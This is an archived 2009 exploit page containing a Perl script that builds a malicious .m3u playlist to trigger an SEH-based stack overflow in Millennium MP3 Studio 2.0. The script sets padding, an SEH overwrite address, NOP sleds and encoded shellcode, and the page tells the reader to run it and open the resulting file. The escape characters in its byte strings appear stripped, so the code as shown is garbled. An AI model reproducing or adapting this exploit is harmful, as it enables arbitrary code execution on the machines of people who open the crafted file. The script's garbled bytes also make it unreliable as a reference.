Home / os / win10

millennium_mp3_studio_2.0_m3u_universal.pl.txt

Posted on 15 October 2009

# [+] Vulnerability : .m3u File Local Stack Overflow Universal Exploit (SEH) # [+] Product : Millenium MP3 Studio # [+] Versions affected : v2.0 # [+] Download : http://www.software112.com/products/mp3-millennium+download.html # [+] Method : seh # [+] Tested on : Windows XP SP2 En, Windows XP SP3 En, Windows Vista SP1 Swe # [+] Written by : dellnull (dellnull[at]gmail[dot]com # [+] Greetz to : corelanc0d3r # [+] Based on http://www.packetstormsecurity.org/0910-exploits/millennium_mp3_studio_2.0.pl.txt (Almost the same ;-) # [+] Just run the script and open the created file (universal.m3u) with Mp3-Millennium 2.0 # [+] Enjoy the NOP slide ;-) # ----------------------------------------------------------------------------- # MMMMM~. # MMMMM?. # MMMMMM8. .=MMMMMMM.. MMMMMMMM, MMMMMMM8. MMMMM?. MMMMMMM: MMMMMMMMMM. # MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM: # MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM: # MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM: # MMMMM=. MMMMM=MMMMM=MMMMM7. 8MMMMM? . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM: # MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM: # =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM: # .:$MMMMMO7:..+OMMMMMO$=.MMMMM7. ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM: # .,,,.. .,,,,. .,,,,, ..,,,.. .,,,,.. .,,...,,,. .,,,,..,,,,. # eip hunters # ----------------------------------------------------------------------------- # # Script provided for educational purposes only. # # # my $sploitfile ="universal.m3u"; my $junk = "http://"; $junk=$junk."A" x 4103; my $nseh ="xebx1dx90x90"; my $seh =pack('V', 0x10012D15); my $nops ="x90" x 25; my $shellcode ="x89xe6xdaxdbxd9x76xf4x58x50x59x49x49x49x49" . "x43x43x43x43x43x43x51x5ax56x54x58x33x30x56" . "x58x34x41x50x30x41x33x48x48x30x41x30x30x41" . "x42x41x41x42x54x41x41x51x32x41x42x32x42x42" . "x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4b" . "x58x50x44x45x50x43x30x43x30x4cx4bx51x55x47" . "x4cx4cx4bx43x4cx45x55x43x48x45x51x4ax4fx4c" . "x4bx50x4fx45x48x4cx4bx51x4fx47x50x45x51x4a" . "x4bx51x59x4cx4bx50x34x4cx4bx45x51x4ax4ex50" . "x31x49x50x4dx49x4ex4cx4cx44x49x50x42x54x43" . "x37x49x51x49x5ax44x4dx43x31x48x42x4ax4bx4b" . "x44x47x4bx51x44x47x54x45x54x42x55x4bx55x4c" . "x4bx51x4fx46x44x43x31x4ax4bx42x46x4cx4bx44" . "x4cx50x4bx4cx4bx51x4fx45x4cx43x31x4ax4bx4c" . "x4bx45x4cx4cx4bx45x51x4ax4bx4dx59x51x4cx51" . "x34x45x54x48x43x51x4fx50x31x4ax56x43x50x51" . "x46x45x34x4cx4bx47x36x46x50x4cx4bx47x30x44" . "x4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx43x58x45" . "x58x4bx39x4bx48x4bx33x49x50x43x5ax46x30x42" . "x48x4ax50x4cx4ax44x44x51x4fx42x48x4ax38x4b" . "x4ex4dx5ax44x4ex51x47x4bx4fx4ax47x42x43x45" . "x31x42x4cx45x33x45x50x41x41"; my $nops2 ="x90" x 100; my $payload = $junk.$nseh.$seh.$nops.$shellcode.$nops2; print " [+] Writing exploit to file : $sploitfile "; open (myfile, ">$sploitfile"); print myfile $payload; close (myfile); print " [+] File ".$sploitfile." created "; print " [+] " .length($payload)." bytes ";

 

TOP